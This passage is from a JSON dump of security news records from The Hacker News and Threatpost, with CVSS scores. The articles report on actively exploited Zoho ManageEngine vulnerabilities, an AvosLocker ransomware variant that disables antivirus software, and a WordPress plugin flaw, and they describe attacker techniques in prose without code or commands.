\"[Zebracon](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>)\" that allows the malware to connect to compromised Zimbra email servers with the goal of retrieving additional instructions.\n\n\"Organizations that identify any activity related to ManageEngine ADSelfService Plus indicators of compromise within their networks should take action immediately,\" CISA [said](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>), in addition to recommending \"domain-wide password resets and double Kerberos Ticket Granting Ticket (TGT) password resets if any indication is found that the ['NTDS.dit](<https://attack.mitre.org/techniques/T1003/003/>)' file was compromised.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-08T14:39:00", "type": "thn", "title": "Experts Detail Malicious Code Dropped Using ManageEngine ADSelfService Exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-09T03:15:09", "id": "THN:D0F9B64B55AE6B07B3B0C0540189389E", "href": "https://thehackernews.com/2021/11/experts-detail-malicious-code-dropped.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:51", "description": "[![Zoho ManageEngine Vulnerability](https://thehackernews.com/new-images/img/a/AVvXsEhq1H4Rr-Xal2CT5stc98f2CNC5FoqAVXUgTeE6lsiHRSi39JatAzNIZWMSPz81BrT4zGJ4ZKnlNew3LX6Gc5DzE7Q-u4OMx1uOoJ1jLkeKAhqNhhuBBofCoPvPprhqa7Kwjs4xOGro4J2Smfu9-y5aCWImMp2AAtoBj_aoe5JFpuPMyi-MIZy8F4oq=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEhq1H4Rr-Xal2CT5stc98f2CNC5FoqAVXUgTeE6lsiHRSi39JatAzNIZWMSPz81BrT4zGJ4ZKnlNew3LX6Gc5DzE7Q-u4OMx1uOoJ1jLkeKAhqNhhuBBofCoPvPprhqa7Kwjs4xOGro4J2Smfu9-y5aCWImMp2AAtoBj_aoe5JFpuPMyi-MIZy8F4oq>)\n\nThe U.S. Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are warning of active exploitation of a newly patched flaw in Zoho's ManageEngine ServiceDesk Plus product to deploy web shells and carry out an array of malicious activities.\n\nTracked as [CVE-2021-44077](<https://nvd.nist.gov/vuln/detail/CVE-2021-44077>) (CVSS score: 9.8), the issue relates to an unauthenticated, remote code execution vulnerability affecting ServiceDesk Plus versions up to and including 11305 that, if left unfixed, \"allows an attacker to upload executable files and place web shells that enable post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files,\" CISA [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/12/02/cisa-and-fbi-release-alert-active-exploitation-cve-2021-44077-zoho>).\n\n\"A security misconfiguration in ServiceDesk Plus led to the vulnerability,\" Zoho [noted](<https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021>) in an independent advisory published on November 22. \"This vulnerability can allow an adversary to execute arbitrary code and carry out any subsequent attacks.\" Zoho [addressed](<https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above>) the same flaw in versions 11306 and above on September 16, 2021.\n\nCVE-2021-44077 is also the second flaw to be exploited by the same threat actor that was formerly found [exploiting](<https://thehackernews.com/2021/11/experts-detail-malicious-code-dropped.html>) a security shortcoming in Zoho's self-service password management and single sign-on solution known as ManageEngine ADSelfService Plus ([CVE-2021-40539](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>)) to compromise at least 11 organizations, according to a new report published by Palo Alto Networks' Unit 42 threat intelligence team.\n\n[![Zoho ManageEngine ServiceDesk Vulnerability](https://thehackernews.com/images/-hM1_vIvcTok/Yamv2q2qXSI/AAAAAAAA4jE/UkCg_Dr3xM40aF_fItjQ6LKcw1t-85-iQCNcBGAsYHQ/s728-e1000/timeline.jpg)](<https://thehackernews.com/images/-hM1_vIvcTok/Yamv2q2qXSI/AAAAAAAA4jE/UkCg_Dr3xM40aF_fItjQ6LKcw1t-85-iQCNcBGAsYHQ/s0/timeline.jpg>)\n\n\"The threat actor expand[ed] its focus beyond ADSelfService Plus to other vulnerable software,\" Unit 42 researchers Robert Falcone and Peter Renals [said](<https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/>). \"Most notably, between October 25 and November 8, the actor shifted attention to several organizations running a different Zoho product known as ManageEngine ServiceDesk Plus.\"\n\nThe attacks are believed to be orchestrated by a \"persistent and determined APT actor\" tracked by Microsoft under the moniker \"[DEV-0322](<https://thehackernews.com/2021/09/microsoft-says-chinese-hackers-were.html>),\" an emerging threat cluster that the tech giant says is operating out of China and has been previously observed exploiting a then zero-day flaw in SolarWinds Serv-U managed file transfer service earlier this year. Unit 42 is monitoring the combined activity as the \"**TiltedTemple**\" campaign.\n\nPost-exploitation activities following a successful compromise involve the actor uploading a new dropper (\"msiexec.exe\") to victim systems, which then deploys the Chinese-language JSP web shell named \"Godzilla\" for establishing persistence in those machines, echoing similar tactics used against the ADSelfService software.\n\nUnit 42 identified that there are currently over 4,700 internet-facing instances of ServiceDesk Plus globally, of which 2,900 (or 62%) spanning across the U.S., India, Russia, Great Britain, and Turkey are assessed to be vulnerable to exploitation.\n\nOver the past three months, at least two organizations have been compromised using the ManageEngine ServiceDesk Plus flaw, a number that's expected to climb further as the APT group ramps up its reconnaissance activities against technology, energy, transportation, healthcare, education, finance, and defense industries. \n\nZoho, for its part, has made available an [exploit detection tool](<https://www.manageengine.com/products/service-desk/security-response-plan.html>) to help customers identify whether their on-premises installations have been compromised, in addition to recommending that users \"upgrade to the latest version of ServiceDesk Plus (12001) immediately\" to mitigate any potential risk arising out of exploitation.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-03T05:24:00", "type": "thn", "title": "CISA Warns of Actively Exploited Critical Zoho ManageEngine ServiceDesk Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539", "CVE-2021-44077"], "modified": "2021-12-03T13:34:13", "id": "THN:60B42277F576BB78A640A9D3B976D8D8", "href": "https://thehackernews.com/2021/12/cisa-warns-of-actively-exploited.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:25", "description": "[![AvosLocker Ransomware](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgX0lKnx5WdFoF_k4rJiFXzL8S6T7QacBw6YLYV-c3wmeack_LrSDflJj-tCiHWWDyuhvCRxff3JxsdWuCd7lCtomS2C0Mirl6h9_PazDFxXRjF9KAahOXfOCaW__Mzb9ltwXwFD0R-03BqrPy0D9gDWD-BXQOCmQdlraj-A-gPB1bJVOdRop98x2to/s728-e1000/antimalware.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgX0lKnx5WdFoF_k4rJiFXzL8S6T7QacBw6YLYV-c3wmeack_LrSDflJj-tCiHWWDyuhvCRxff3JxsdWuCd7lCtomS2C0Mirl6h9_PazDFxXRjF9KAahOXfOCaW__Mzb9ltwXwFD0R-03BqrPy0D9gDWD-BXQOCmQdlraj-A-gPB1bJVOdRop98x2to/s728-e100/antimalware.jpg>)\n\nCybersecurity researchers have disclosed a new variant of the AvosLocker ransomware that disables antivirus solutions to evade detection after breaching target networks by taking advantage of unpatched security flaws. \n\n\"This is the first sample we observed from the U.S. with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file (asWarPot.sys),\" Trend Micro researchers, Christoper Ordonez and Alvin Nieto, [said](<https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html>) in a Monday analysis.\n\n\"In addition, the ransomware is also capable of scanning multiple endpoints for the Log4j vulnerability (Log4shell) using Nmap [NSE script](<https://nmap.org/book/man-nse.html>).\"\n\n[AvosLocker](<https://thehackernews.com/2021/08/researchers-warn-of-4-new-ransomware.html>), one of the newer ransomware families to fill the vacuum left by [REvil](<https://thehackernews.com/2022/01/russia-arrests-revil-ransomware-gang.html>), has been linked to a number of attacks that targeted critical infrastructure in the U.S., including financial services and government facilities.\n\nA ransomware-as-a-service (RaaS) affiliate-based group first spotted in July 2021, AvosLocker goes beyond double extortion by auctioning data stolen from victims should the targeted entities refuse to pay the ransom.\n\nOther targeted victims claimed by the ransomware cartel are said to be located in Syria, Saudi Arabia, Germany, Spain, Belgium, Turkey, the U.A.E., the U.K., Canada, China, and Taiwan, according to an [advisory](<https://www.cisa.gov/uscert/ncas/current-activity/2022/03/22/fbi-and-fincen-release-advisory-avoslocker-ransomware>) released by the U.S. Federal Bureau of Investigation (FBI) in March 2022.\n\nTelemetry data gathered by Trend Micro [shows](<https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-avoslocker>) that the food and beverage sector was the most hit industry between July 1, 2021 and February 28, 2022, followed by technology, finance, telecom, and media verticals.\n\nThe entry point for the attack is believed to have been facilitated by leveraging an exploit for a remote code execution flaw in Zoho's ManageEngine ADSelfService Plus software ([CVE-2021-40539](<https://thehackernews.com/2021/11/experts-detail-malicious-code-dropped.html>)) to run an HTML application ([HTA](<https://en.wikipedia.org/wiki/HTML_Application>)) hosted on a remote server.\n\n\"The HTA executed an obfuscated PowerShell script that contains a shellcode, capable of connecting back to the [command-and-control] server to execute arbitrary commands,\" the researchers explained.\n\nThis includes retrieving an ASPX web shell from the server as well as an installer for the [AnyDesk](<https://thehackernews.com/2021/05/malvertising-campaign-on-google.html>) remote desktop software, the latter of which is used to deploy additional tools to scan the local network, terminate security software, and drop the ransomware payload.\n\nSome of the components copied to the infected endpoint are a Nmap script to scan the network for the Log4Shell remote code execution flaw ([CVE-2021-44228](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>)) and a mass deployment tool called PDQ to deliver a malicious batch script to multiple endpoints. \n\nThe batch script, for its part, is equipped with a wide range of capabilities that allows it to disable Windows Update, Windows Defender, and Windows Error Recovery, in addition to preventing safe boot execution of security products, creating a new admin account, and launching the ransomware binary.\n\nAlso used is aswArPot.sys, a legitimate Avast anti-rootkit driver, to kill processes associated with different security solutions by weaponizing a now-fixed vulnerability in the driver the Czech company [resolved in June 2021](<https://forum.avast.com/index.php?topic=283231.0>).\n\n\"The decision to choose the specific rootkit driver file is for its capability to execute in kernel mode (therefore operating at a high privilege),\" the researchers pointed out. \"This variant is also capable of modifying other details of the installed security solutions, such as disabling the legal notice.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-03T05:50:00", "type": "thn", "title": "AvosLocker Ransomware Variant Using New Trick to Disable Antivirus Protection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539", "CVE-2021-44228"], "modified": "2022-05-03T05:50:32", "id": "THN:E7E8D45492BAD83E88C89D34F8502485", "href": "https://thehackernews.com/2022/05/avoslocker-ransomware-variant-using-new.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-17T06:36:28", "description": "[![Zoho ManageEngine ADSelfService Vulnerability](https://thehackernews.com/images/-sCM6j8kvs2s/YTme1HWgMII/AAAAAAAADwM/Wyzei6Ccbz8Z4NBhBhEEtrtdCIkbrEkGwCLcBGAsYHQ/s728-e1000/zoho.jpg)](<https://thehackernews.com/images/-sCM6j8kvs2s/YTme1HWgMII/AAAAAAAADwM/Wyzei6Ccbz8Z4NBhBhEEtrtdCIkbrEkGwCLcBGAsYHQ/s0/zoho.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday issued a bulletin warning of a zero-day flaw affecting Zoho ManageEngine ADSelfService Plus deployments that is currently being actively exploited in the wild.\n\nThe flaw, tracked as [CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>), concerns a REST API authentication bypass that could lead to arbitrary remote code execution (RCE). ADSelfService Plus builds up to 6113 are impacted.\n\nManageEngine ADSelfService Plus is an integrated self-service password management and a single sign-on solution for Active Directory and cloud apps, enabling admins to enforce two-factor authentication for application logins and users to reset their passwords.\n\n\"CVE-2021-40539 has been detected in exploits in the wild. A remote attacker could exploit this vulnerability to take control of an affected system,\" CISA [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>), urging companies to apply the latest security update to their ManageEngine servers and \"ensure ADSelfService Plus is not directly accessible from the internet.\"\n\n\"The exploitation of ManageEngine ADSelfService Plus poses a serious risk to critical infrastructure companies, U.S.-cleared defense contractors, academic institutions, and other entities that use the software,\" CISA [said](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>). \"Successful exploitation of the vulnerability allows an attacker to place webshells, which enable the adversary to conduct post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files.\"\n\nIn an independent advisory, Zoho [cautioned](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) that it's a \"critical issue\" and that it's \"noticing indications of this vulnerability being exploited.\"\n\n\"This vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request,\" the company said. \"This would allow the attacker to carry out subsequent attacks resulting in RCE.\"\n\nCVE-2021-40539 is the fifth security weakness disclosed in ManageEngine ADSelfService Plus since the start of the year, three of which \u2014 [CVE-2021-37421](<https://nvd.nist.gov/vuln/detail/CVE-2021-37421>) (CVSS score: 9.8), [CVE-2021-37417](<https://nvd.nist.gov/vuln/detail/CVE-2021-37417>) (CVSS score: 9.8), and [CVE-2021-33055](<https://nvd.nist.gov/vuln/detail/CVE-2021-33055>) (CVSS score: 9.8) \u2014 were addressed in recent updates. A fourth vulnerability, [CVE-2021-28958](<https://nvd.nist.gov/vuln/detail/CVE-2021-28958>) (CVSS score: 9.8), was rectified in March 2021.\n\nThis development also marks the second time a flaw in Zoho enterprise products has been actively exploited in real-world attacks. In March 2020, APT41 actors were [found](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>) leveraging an RCE flaw in ManageEngine Desktop Central ([CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>), CVSS score: 9.8) to download and execute malicious payloads in corporate networks as part of a global intrusion campaign.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T05:45:00", "type": "thn", "title": "CISA Warns of Actively Exploited Zoho ManageEngine ADSelfService Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189", "CVE-2021-28958", "CVE-2021-33055", "CVE-2021-37417", "CVE-2021-37421", "CVE-2021-40539"], "modified": "2021-09-17T04:49:55", "id": "THN:1678C3AE3BCB0278860461A943C3DF30", "href": "https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-12-21T14:43:15", "description": "Another Zoho ManageEngine zero-day vulnerability is under active attack from an APT group, this time looking to override legitimate functions of servers running ManageEngine Desktop Central and elevate privileges \u2014 with an ultimate goal of dropping malware onto organizations\u2019 networks, the FBI has warned.\n\nAPT actors have been exploiting the bug, tracked as [CVE-2021-44515](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44515>), since at least late October, the feds revealed in an [FBI Flash alert](<https://www.ic3.gov/Media/News/2021/211220.pdf>) released last week. There is also evidence to support that it\u2019s being used in an attack chain with two other Zoho bugs that researchers have observed under attack since September, according to the alert.\n\nThe latest vulnerability is an authentication-bypass vulnerability in ManageEngine Desktop Central that can allow an attacker to execute arbitrary code in the Desktop Central server, according to a Zoho [advisory](<https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html>) that addressed the issue, published earlier this month.\n\nIndeed, the feds said they observed APT actors doing exactly that. More specifically, researchers observed attackers \u201ccompromising Desktop Central servers, dropping a webshell that overrides a legitimate function of Desktop Central, downloading post-exploitation tools, enumerating domain users and groups, conducting network reconnaissance, attempting lateral movement and dumping credentials,\u201d according to the Flash Alert.\n\nZoho has addressed the vulnerability and is urging organizations to update to the appropriate latest builds of ManageEngine Desktop Central due to \u201cindications of exploitation,\u201d the company said in its advisory.\n\nSpecifically, the company is advising enterprise customers who have builds10.1.2127.17 and below deployed to upgrade to build [10.1.2127.18](<https://downloads.zohocorp.com/dnd/Desktop_Central/vSfr4V3f7NXjEJK/ManageEngine_Desktop_Central_10_1_0_SP-2127_18.ppm>); and those using builds 10.1.2128.0 to 10.1.2137.2 to upgrade to build [10.1.2137.3](<https://downloads.zohocorp.com/dnd/Desktop_Central/5fbkfifZFuh9mVx/ManageEngine_Desktop_Central_10_1_0_SP-2137_3.ppm>).\n\n## **Zoho Under Fire**\n\nThe bug is the third zero-day under active attack that researchers have discovered in the cloud platform company\u2019s ManageEngine suite since September, spurring dire warnings from the FBI and researchers alike.\n\nThough no one has yet conclusively identified the APT responsible, it\u2019s likely the attacks are linked and those responsible are from China, previous evidence has shown.\n\nEarlier this month, researchers at Palo Alto Networks Unit 42 [revealed](<https://threatpost.com/threat-group-takes-aim-again-at-cloud-platform-provider-zoho/176732/>) that state-backed adversaries were using vulnerable versions of ManageEngine ServiceDesk Plus to target a number of U.S. organizations between late October and November.\n\nThe attacks were related to a bug revealed in a Nov. 22 [security advisory](<https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021>) by Zoho alerting customers of active exploitation against newly registered [CVE-2021-44077](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44077>) found in Manage Engine ServiceDesk Plus. The vulnerability, which allows for unauthenticated remote code execution, impacts ServiceDesk Plus versions 11305 and below.\n\nThat news came on the heels of [warnings](<https://threatpost.com/cisa-fbi-state-backed-apts-exploit-critical-zoho-bug/174768/>) in September by the FBI, CISA and the U.S. Coast Guard Cyber Command (CGCYBER) that an unspecified APT was exploiting a then-zero-day vulnerability in Zoho ManageEngine\u2019s password management solution called ADSelfService Plus.\n\nZoho issued [a fix](<https://threatpost.com/zoho-password-manager-zero-day-attack/169303/>) for the vulnerability, tracked as [CVE-2021-40539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539>), soon after; still, researchers observed attackers [exploiting it](<https://threatpost.com/zoho-password-manager-flaw-godzilla-webshell/176063/>) later in November in their continued assault on defense, energy and healthcare organizations.\n\nUnit 42 researchers combined the two previously known active attack fronts against Zoho\u2019s ManageEngine as the [\u201cTitledTemple\u201d](<https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/>) campaign, and said earlier this month that there is evidence to link the APT responsible to China, although it is not conclusive.\n\nThe latest Flash Alert released by the FBI also shows a correlation between earlier APT attacks on ManageEngine and AdSelfService Plus, with malicious samples of code observed in the latest exploitation \u201cdownloaded from likely compromised ManageEngine \nADSelfService Plus servers,\u201d according to the alert.\n\n## **Inside the Exploitation **\n\nThose samples show initial exploitation of a Desktop Central API URL that allowed for an unauthenticated file upload of two different variants of webshells; the first variant was delivered using either the file name \u201cemsaler.zip\u201d or \u201ceco-inflect.jar\u201d in late October and mid-November, respectively; and a second variant using the file name \u201caaa.zip\u201d in late November.\n\nThe webshell overrides the legitimate Desktop Central API servlet endpoint, \u201c/fos/statuscheck,\u201d and either filters inbound GET in the case of the second variant, or POST requests in the case of the first variant, to that URL path, according to the FBI. It then allows attackers to execute commands as the SYSTEM user with elevated privileges if the inbound requests pass the filter check.\n\nThe webshell allows attackers to conduct initial reconnaissance and domain enumeration, after which the actors use BITSAdmin to download a likely ShadowPad variant dropper with filename mscoree.dll, and a legitimate Microsoft AppLaunch binary, iop.exe, according to the FBI. Attackers then sideload the dropper through AppLaunch execution, creating a persistent service to execute the AppLaunch binary moving forward.\n\n\u201cUpon execution, the dropper creates an instance of svchost and injects code with RAT-like functionality that initiates a connection to a command and control server,\u201d according to the FBI.\n\nThreat actors conduct follow-on intrusion activity through the RAT, including attempted lateral movement to domain controllers and credential dumping techniques using Mimikatz, comsvcs.dll LSASS process memory dumping, and a WDigest downgrade attack with subsequent LSASS dumping through pwdump, researchers observed.\n\nThe FBI Flash Alert includes a detailed list of indicators of compromise so organizations using Zoho\u2019s ManageEngine Desktop Central can check to see if they are at risk or have been a victim of attack.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-21T14:42:02", "type": "threatpost", "title": "FBI: Another Zoho ManageEngine Zero-Day Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539", "CVE-2021-44077", "CVE-2021-44515"], "modified": "2021-12-21T14:42:02", "id": "THREATPOST:927CAECDA58E6BC3266D14FE340589BB", "href": "https://threatpost.com/zoho-zero-day-manageengine-active-attack/177178/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-18T16:17:40", "description": "Researchers have discovered three [WordPress plug-ins](<https://threatpost.com/wordpress-plugin-bug-wipe-sites/175826/>) with the same vulnerability that allows an attacker to update arbitrary site options on a vulnerable site and completely take it over. Exploiting the flaw does require some action from the site administrator, however.\n\nOn Nov. 5, 2021, the Wordfence Threat Intelligence team started a process to disclose a vulnerability researchers had found in \u201c[Login/Signup Popup](<https://wordpress.org/plugins/easy-login-woocommerce>),\u201d a [WordPress plug-in](<https://threatpost.com/frontend-file-manager-wordpress-bugs/167687/>) installed on more than 20,000 sites, Wordfence\u2019s Chloe Chamberland wrote [in a post](<https://www.wordfence.com/blog/2022/01/84000-wordpress-sites-affected-by-three-plugins-with-the-same-vulnerability/?utm_medium=email&_hsmi=200773868&_hsenc=p2ANqtz-8wONqcLAiQD8o__3dsSDSjuLwHX4hhqMgH_Vvhs-LcUGTU2JWYOvVeflfGHs_Uz1VP67vtVIWObFp9507lPzgx4OjFww&utm_content=200773868&utm_source=hs_email>) published online Thursday.\n\nHowever, a few days later they discovered that the flaw was present in two other plug-ins by the same developer, who goes by the online name of [XootiX.](<https://xootix.com/>) They are \u201c[Side Cart Woocommerce (Ajax)](<https://wordpress.org/plugins/side-cart-woocommerce/>),\u201d which has been installed on more than 60,000 sites, and \u201c[Waitlist Woocommerce (Back in stock notifier)](<https://wordpress.org/plugins/waitlist-woocommerce/>),\u201d which has been installed on more than 4,000.\n\nLogin/Signup Popup is a \u201csimple and lightweight\u201d plug-in aimed at streamlining a site\u2019s registration, login and password reset processes, according to its description online. Side Cart Woocommerce \u2013 designed to work with the Woocommerce plugin for creating an e-commerce store \u2013 allows a site\u2019s users to access items they\u2019ve placed into a shopping cart using from anywhere on the site. Waitlist Woocommerce \u2013 also to be used with Woocommerce \u2013 adds the functionality of tracking demand for out-of-stock items to an e-commerce site.\n\nAs of now, all of the plug-ins have been updated and the flaw patched, according to the post. On Nov. 24, the developer released a patched version of Login/Signup Popup as version 2.3. Later, on Dec. 17, a patched version of Waitlist Woocommerce, version 2.5.2, was released; and a patched version of Side Cart Woocommerce, version 2.1, was released.\n\nStill, the discovery of the bug\u2019s multiple occurrences reflects an ongoing issue with WordPress plug-ins being riddled with flaws. Indeed, vulnerabilities in the plug-ins [skyrocketed](<https://www.riskbasedsecurity.com/2022/1/11/wordpress-vulnerabilities-more-than-doubled-in-2021/>) with triple-digit growth in 2021, according to RiskBased Security.\n\n## **How the Flaw Works**\n\nThe vulnerability found by the Wordfence team is fairly straightforward, Chamberland wrote. All three plug-ins register the save_settings function, which is initiated via a wp_ajax action, they said.\n\nIn each of the plug-ins, \u201cthis function was missing a nonce check, which meant that there was no validation on the integrity of who was conducting the request,\u201d according to the post.\n\nWhat this sets up is a scenario in which an attacker can craft a request that would trigger the 